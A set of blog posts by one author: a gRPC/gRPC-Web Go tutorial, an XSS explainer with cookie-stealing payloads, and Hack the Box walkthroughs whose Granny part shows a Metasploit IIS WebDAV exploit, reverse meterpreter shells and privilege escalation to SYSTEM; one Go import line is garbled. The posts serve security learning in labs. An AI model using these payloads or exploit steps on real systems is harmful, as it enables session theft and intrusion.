DEV Community: ikkyu

Using gRPC and gRPC-Web with a Golang

ikkyu — Mon, 13 Dec 2021 04:08:12 +0000

Set Up

The final directory structure will look like this.

 go
  |_prj
     |_gRPC_prjweb_tmp
          |-api.proto
          |-client
          |  |_client.go
          |-docker-compose.yaml
          |-go.mod
          |-go.sum
          |-html
          |  |-dist
          |  |  |_main.js
          |  |-index.html
          |  |_index.js
          |-Makefile
          |-pb
          |  |-api_grpc_web_pb.js
          |  |-api.pb.go
          |  |-api_pb.js
          |  |-node_modeles
          |  |-package.json
          |  |_package-lock.json
          |-proxy
          |  |-conf
          |  |  |_envoy.yaml
          |  |_Dockerfile
          |_server
             |_server.go

And network structure will look like this.

gRPC_web(4444)<-->envoy(8080)<-->gRPC_server(8000)

First, build the environment.

go mod init web_tmp
go get google.golang.org/protobuf github.com/sirupsen/logrus golang.org/x/net/context google.golang.org/grpc google.golang.org/grpc/codes google.golang.org/grpc/status

gRPC

Create a proto file.
[api.proto]

syntax = "proto3";

service Greeter {
  rpc Hello (HelloRequest) returns (HelloReply) {}
}

message HelloRequest {
  string name = 1;
}

message HelloReply {
  string message = 1;
}

Create a pb directory, and generate Protocol Buffers code from api.proto file.

mkdir pb
protoc --go_out=plugins=grpc:pb api.proto

Create a server directory and a client directory.

mkdir server
mkdir client

Then we'll write the server and client code.
[sever/server.go]

package main

import (
    "fmt"
    pb "web_tmp/pb"
    "net"
    "github.com/sirupsen/logrus"
    "gINFO[0000] Greeting: Hello lupinolang.org/x/net/context"
    "google.golang.org/grpc"
)

func main() {
    listener, err := net.Listen("tcp", ":8000")
    if err != nil {
            panic(err)
    }
    server := grpc.NewServer()
    greeterService := &GreeterService{}
    pb.RegisterGreeterServer(server, greeterService)
    logrus.Info(fmt.Sprintf("start server: %#v", listener.Addr().String()))
    server.Serve(listener)
}

type GreeterService struct {}

func (s *GreeterService) Hello(ctx context.Context, in *pb.HelloRequest) (*pb.HelloReply, error) {
        return &pb.HelloReply{Message: "Hello " + in.GetName()}, nil
}

[client/client.go]

package main

import (
    "context"
    pb "web_tmp/pb"
    "github.com/sirupsen/logrus"
    "google.golang.org/grpc"
)

func main() {
    conn, err := grpc.Dial("localhost:8000", grpc.WithInsecure())
    if err != nil {
            panic(err)
    }
    defer conn.Close()

    c := pb.NewGreeterClient(conn)
    name := &pb.HelloRequest{Name: "lupin"} 

    r, err := c.Hello(context.TODO(), name)
    if err != nil {
        logrus.Error(err)
    }
    logrus.Info("Greeting: ", r.GetMessage())
}

Create a makefile.
[Makefile]

.PHONY: server client

server:
        go run ./server/server.go

client: 
        go run ./client/client.go

Start the server.

make server

Run the client code.

make client

We can see the gRPC server returning "Hello lupin".

INFO[0000] Greeting: Hello lupin

gRPC-web

Next, we'll write the code for gRPC-web communication.

protoc --js_out=import_style=commonjs:pb --grpc-web_out=import_style=commonjs,mode=grpcwebtext:pb api.proto

The api_grpc_web_pb created here under pb directory will be imported into the js file to be created later. Also, install the modules grpc-web and google-protobuf as they are required for webpack.

cd pb
npm install grpc-web
npm install google-protobuf

Create an html directory and create a js file.

mkdir html

[html/index.js]

import proto from '../pb/api_grpc_web_pb';
var client = new proto.GreeterClient('http://localhost:8080');
var request = new proto.HelloRequest();
request.setName("lupin");
client.hello(request, {}, function(err, response) {
    if (err) {
        console.log(err.code);
        console.log(err.message);
    } else {
        console.log(response.getMessage());
    }
});

Proxy

Create a proxy directory and a conf directory under it for prepareing envpy proxy. Write the envoy.yaml file under the conf directory you created.

[proxy/conf/envoy.yaml]

admin:
  access_log_path: /tmp/admin_access.log
  address:
    socket_address: { address: 127.0.0.1, port_value: 9901 }

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address: { address: 127.0.0.1, port_value: 8080 }
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.config.filter.network.http_connection_manager.v2.HttpConnectionManager
          codec_type: auto
          stat_prefix: ingress_http
          access_log:
            - name: envoy.access_loggers.file
              typed_config:
                "@type": type.googleapis.com/envoy.config.accesslog.v2.FileAccessLog
                path: "/dev/stdout"
          route_config:
            name: local_route
            virtual_hosts:
            - name: local_service
              domains: ["*"]
              routes:
              - match: { prefix: "/" }
                route:
                  cluster: greeter_service
                  max_grpc_timeout: 0s
              cors:
                allow_origin_string_match:
                  - prefix: "*"
                allow_methods: GET, PUT, DELETE, POST, OPTIONS
                allow_headers: keep-alive,user-agent,cache-control,content-type,content-transfer-encoding,custom-header-1,x-accept-content-transfer-encoding,x-accept-response-streaming,x-user-agent,x-grpc-web,grpc-timeout
                max_age: "1728000"
                expose_headers: custom-header-1,grpc-status,grpc-message
          http_filters:
          - name: envoy.filters.http.grpc_web
          - name: envoy.filters.http.cors
          - name: envoy.filters.http.router
  clusters:
  - name: greeter_service
    connect_timeout: 0.25s
    type: logical_dns
    http2_protocol_options: {}
    lb_policy: round_robin
    dns_lookup_family: V4_ONLY
    upstream_connection_options:
      tcp_keepalive:
        keepalive_time: 300
    load_assignment:
      cluster_name: cluster_0
      endpoints:
        - lb_endpoints:
            - endpoint:
                address:
                  socket_address:
                    address: 172.17.0.1
                    port_value: 8000

Administration interface of envoy is 9901 port, and envoy proxy is 8080 port. Envoy passes the received communication to the server on port 8000. The docker address may vary depending on your environment, so check it.

ip a | grep docker

Create the Docker file.
[proxy/Dockerfile]

FROM envoyproxy/envoy:v1.15.0
COPY ./conf/envoy.yaml /etc/envoy/envoy.yaml
CMD /usr/local/bin/envoy -c /etc/envoy/envoy.yaml

Start up the container in a proxy directory.

docker build -t envoy/hello_lupin .
docker run -d --rm -p 8080:8080 -p 9901:9901 -v ~/go/prj/gRPC_prj/web_tmp/proxy/conf:/etc/envoy --name Greeter envoy/hello_lupin

Or create docker-compose.yaml in web_tmp directory.
[docker-compose.yaml]

version: '3'
services:
  envoy:
    build:
      context: ./proxy
    image: hello_lupin
    container_name: Greeter
    ports:
      - 8080:8080

Then,

docker-compose up

By the way, if you want to stop the container

docker stop Greeter

Add the webpack command and the command to build the server to the make file and run it.
[Makefile]

.PHONY: server client make_webclient

server:
        go run ./server/server.go

client: 
        go run ./client/client.go

web_client:
        cd ./html && webpack ./index.js && static -p 4444

Then,

make web_client

Access 4444 port on localhost with a browser and check the Developer Tools console.

Learning XSS (Cross Site Scripting）with concrete code

ikkyu — Wed, 19 May 2021 10:45:50 +0000

Hi, I'm ikkyu, and I had a chance to summarize XSS, so I thought I'd write about it. XSS is a bit complicated for beginners, isn't it? There are not many sites that explain XSS with concrete code, so it's hard to visualize.

twitter:@ikk_hck

What is XSS?

According to the IPA (Information-technology Promotion Agency, Japan), cross-site scripting accounts for 58% of all reported website vulnerabilities.

The fundamental problem is that it is possible to insert scripts into a website from the outside.
In addition, cross-site scripting basically targets applications that dynamically generate pages in response to user input.
Recently, cross-site scripting is called cross-site scripting even if it is not cross-site (in this case, redirected), which tends to confuse newcomers.

Same-origin policy

First of all, there is a restriction on the same source policy for browsers. For example, if I visit another site and my browser executes a script that was written there, the script will not be able to retrieve my browser's cookies.
In short, browsers are built with the concept of "same origin policy", so a script loaded from one site cannot access data from another site. And XSS is all about circumventing the identity restriction policy restrictions.

Types of XSS

Reflected XSS
Stored XSS
DOM-based XSS

If you are new to XSS, the following explanation may not seem like much to you, but don't worry. If you are new to XSS, the following explanation may not be very clear to you, but don't worry, just skim through it and read here again after you finish reading the article.
　First of all, there is a horizontal frame, which contains reflective and retractive types. For these, the attack script is executed on the server side. On the other hand, the DOM-based type will have the attack script executed on the front side (*basically).
　Next, the vertical frame, DOM-based is classified as a reflective type, so it is in the same frame as the reflective type. The reflective and DOM-based types are similar in some ways, so the DOM-based type is classified as a subcategory of the reflective type.

Reflected type

The attacker prepares a link containing a malicious script in a fake email or on a fake website
The attacker directs the user to a vulnerable website by making the user step on the link (make a request)
Execute the malicious script in the user's browser
Exploit information or download malware

For example, let's assume that the site "http://localhost/sample.php" in the link prepared by the attacker in ① in the figure looks like the following.

<?php
  session_start();
?>

<?php
    header("Content-Type: text/html; charset=UTF-8");
    $input = filter_input(INPUT_GET, "q");
?>

<!doctype html>
<html>
<head>
    <title>xss</title>
</head>
<body>
    <form>
        <input type="text" name="q" value="<?=$input?>">
        <input type="submit" value="search">
    </form>
<?php
    if($input):
?>
    <?=$input?> is found.
<?php
    endif;
?>
</body>
</html>

The output of the page will look like this.

As a side note, when building an environment with XAMPP, if you download XAMPP from chrome on a mac, it won't work. In my case it worked fine from safari.

Here, you can attach a link like "http://localhost/sample.php?q=var id = document.cookie; window.location=<code>http://localhost/tmp.php?sessionid=${id}</code>"
and attach the link to an email or something, and have someone follow the link. In the js that I use for the query, I first put the cookie in the id variable, and then redirect the user to tmp.php, keeping that variable. When the link is clicked, the

<?php
    if($input):
?>
    <?=$input?> is found.
<?php
    endif;
?>

In sample.php, the <? =$input?> part

<script>var id = document.cookie; window.location=`http://localhost/tmp.php?sessionid=${id}`</script>

is inserted and fires, redirecting the page to tmp.php with the cookie intact as planned. tmp.php, for example

<?php
    header("Content-Type: text/html; charset=UTF-8");
    $input = filter_input(INPUT_GET, "sessionid");
?>

<!doctype html>
<html>
<head>
    <title>xss</title>
</head>
<body>
    <?=$input?> 
</body>
</html>

It stores the content of the received sessionid in $input and displays it.

You can see that the session ID is displayed.

Stored type

The characteristics of the stored type are

The script is written to the database
Users only need to use the web app as usual to execute the attack
The attack can be carried out on an unspecified number of users after some time has passed

etc.

Let's take a bulletin board site as an example. First, an attacker posts a string containing a malicious script to the bulletin board. The malicious script will then be stored in the database used by the web application.
　When this happens, the script runs persistently on the web page, regardless of whether the attack code is written in the HTTP request or not, as in the reflective type. Since the code is executed every time a user accesses the page, the damage tends to increase.

DOM-based type

Features

Reflective subcategories
Runs in the client's browser
No scripts embedded in HTML
Bypasses the browser's XSS protection mechanism

Since the script is not embedded in the HTML, the server side does not output the attack script. In other words, while reflective and retractive attacks exploit server-side bugs, DOM-base attacks exploit client-side bugs.

<!doctype html>
<html>
<head>
    <title>xss</title>
</head>
<body>
<script>
    document.write(decodeURIComponent (location.hash));
</script>
</body>
</html>

Suppose you have a dom_based.html like this Now, create a link "http://localhost/dom_based.html#var id = document.cookie; window.location=<code>http://localhost/tmp.php?sessionid =${id}</code>" and make someone step on the link as in the reflective type. The composition is the same as what we saw in the reflective type.

Then, in the script tag in dom_based.html,

<script>var id = document.cookie; window.location=`http://localhost/tmp.php?sessionid=${id}`</script>

written under # in the link will fire, redirecting to tmp.php and leaking the cookie. The important difference here from the reflective type is that the server does not output the attack script.
In recent years, as the use of JavaScript to manipulate HTML in browsers has increased, the rate of DOM-based XSS has also increased.

security measures

Keep your applications up-to-date Sanitizing
Block unauthorized emails
WAF
Specifying character encoding in the Content-Type field of HTTP response headers

These are just a few examples. In this article, I will not go into the details of each countermeasure, as I will only discuss the behavior and mechanism of xss.

Use "createElement", "createTextNode", etc. instead of "document.write", etc
If you really want to use "document.write", escape it in that place
Check the behavior of fragment identifiers

It is also important to check the behavior of fragment identifier values. As for the last point, "check the behavior of fragment identifier values", reflected XSS determines whether or not there is a vulnerability based on whether or not the script is input to the web application and is output in the response returned from the website.
　DOM-based XSS, on the other hand, is completed in the front-end and the script is not output in the response from the website. Therefore, it is not possible to diagnose the presence of vulnerabilities using the same method as for reflected XSS.

【Hack the Box】Granny - Walkthrough

ikkyu — Mon, 10 May 2021 12:01:32 +0000

From the HacktheBox

twitter:@ikk_hck

Enumeration

Anyway, nmap.

$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT

Here are the results.

# Nmap 7.91 scan initiated Sat May  8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds

You can see that Microsoft IIS httpd 6.0 is working.
I'll look for it in Metasploit.

$ msfconsole   

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |                                                     
  |                 o         |       .'  LOOT  '.        |                                                     
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |                                                     
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |                                                     
  | |________________|__|)__| |    |     __||_)     |     |                                                     
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |                                                     
  |  = = = = = = = = = = = =  |     '--------------'      |                                                     
  +---------------------------+---------------------------+                                                     


       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 > search iis 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow
   1  auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal  No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   2  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

Exploit

I found it, set the ip address, etc. and ran it.

msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):                                           

   Name           Current Setting  Required  Description                                                        
   ----           ---------------  --------  -----------                                                        
   MAXPATHLENGTH  60               yes       End of physical path brute force                                   
   MINPATHLENGTH  3                yes       Start of physical path brute force                                 
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]       
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syn  
                                             tax 'file:<path>'                                                  
   RPORT          80               yes       The target port (TCP)                                              
   SSL            false            no        Negotiate SSL/TLS for outgoing connections                         
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700             

meterpreter >

The intrusion was successful.

PE

meterpreter > getuid                                                                                            
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

I try to check permissions, but I can't seem to even do that.
Let's check the process.

meterpreter > ps                                                                                                

Process List                                                                                                    
============                                                                                                    

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 596   396   svchost.exe
 680   396   svchost.exe
 736   396   svchost.exe
 784   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1084  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1216  396   svchost.exe
 1332  396   VGAuthService.exe
 1412  396   vmtoolsd.exe
 1464  396   svchost.exe
 1628  396   svchost.exe
 1732  396   dllhost.exe
 1816  396   alg.exe
 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse
                                                                             .exe
 1900  396   dllhost.exe
 2120  396   vssvc.exe
 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.
                                                                             exe
 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcd
                                                                             ata.exe
 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2488  596   wmiprvse.exe

What's my process?

meterpreter > getpid
Current pid: 2308

meterpreter > getpid
Current pid: 2308

I see, it will move to one of the processes whose username is "NT AUTHORITY\NETWORK SERVICE".

meterpreter > migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.

Then you check the user again, you will see that it is "NT AUTHORITY\NETWORK SERVICE".

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

Return to the local terminal once to find a code that can be used for PE.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

I try to use "ms14_058_track_popup_menu", but it doesn't work.
Next, try to use "ms14_070_tcpip_ioctl".

msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It seems to have succeeded, so I went ahead and checked the permissions and found that they are "NT AUTHORITY\SYSTEM".
Then, follow the steps below to explore and get the flag.

meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-04-12 07:27:12 -0700  ADFS
100777/rwxrwxrwx  0       fil   2017-04-12 07:04:44 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-04-12 07:04:44 -0700  CONFIG.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  Documents and Settings
40777/rwxrwxrwx   0       dir   2017-04-12 07:17:24 -0700  FPSE_search
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  IO.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 07:16:33 -0700  Inetpub
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  MSDOS.SYS
100555/r-xr-xr-x  47772   fil   2007-02-18 04:00:00 -0800  NTDETECT.COM
40555/r-xr-xr-x   0       dir   2017-04-12 06:43:02 -0700  Program Files
40777/rwxrwxrwx   0       dir   2017-04-12 12:02:02 -0700  RECYCLER
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  System Volume Information
40777/rwxrwxrwx   0       dir   2017-04-12 06:41:07 -0700  WINDOWS
100666/rw-rw-rw-  208     fil   2017-04-12 06:42:08 -0700  boot.ini
100444/r--r--r--  297072  fil   2007-02-18 04:00:00 -0800  ntldr
0000/---------    0       fif   1969-12-31 16:00:00 -0800  pagefile.sys
40777/rwxrwxrwx   0       dir   2017-04-12 07:05:06 -0700  wmpub

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 07:12:15 -0700  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 12:19:46 -0700  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:32 -0700  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:31 -0700  NetworkService

meterpreter > cd Administrator 
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
---------              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 07:12:15 -0700  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 07:12:15 -0700  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 11:48:10 -0700  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 07:12:15 -0700  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 07:12:15 -0700  ntuser.ini

meterpreter > cd Desktop 
lmeterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
---------              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 07:28:50 -0700  root.txt

incidentally

If you try to PE without changing it from the original process, you will get the following.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

Good night.

【Hack the Box】Beep - Walkthrough

ikkyu — Wed, 24 Mar 2021 02:18:56 +0000

Twitter: ikk_hck

From the HackTheBox

Enumeration

$ nmap -oA nmap -sV 10.10.10.7                                                                                       130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 02:33 PDT
Nmap scan report for 10.10.10.7
Host is up (0.27s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap?
443/tcp   open  ssl/https?
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.95 seconds

Access port 80.

Explore the directory.

$ gobuster dir -u https://10.10.10.7 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -k

"-k" is an option to not validate the SSL certificate.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/22 12:10:13 Starting gobuster
===============================================================
/admin (Status: 301)
/images (Status: 301)
/modules (Status: 301)
/themes (Status: 301)
/help (Status: 301)
/var (Status: 301)
/mail (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/libs (Status: 301)
/panel (Status: 301)
/configs (Status: 301)
/recordings (Status: 301)
/vtigercrm (Status: 301)
===============================================================
2021/03/22 12:50:18 Finished
===============================================================

Let's see "/help".

It shows that the last backup was in 2010.

Find out which version of elastix was released in 2010(http://freshmeat.sourceforge.net/projects/elastix/releases).

We can see that Elastix version is 2.0.

Search for elastix in Exploitdb.

$ searchsploit elastix    
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                      | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                    | php/webapps/38544.txt
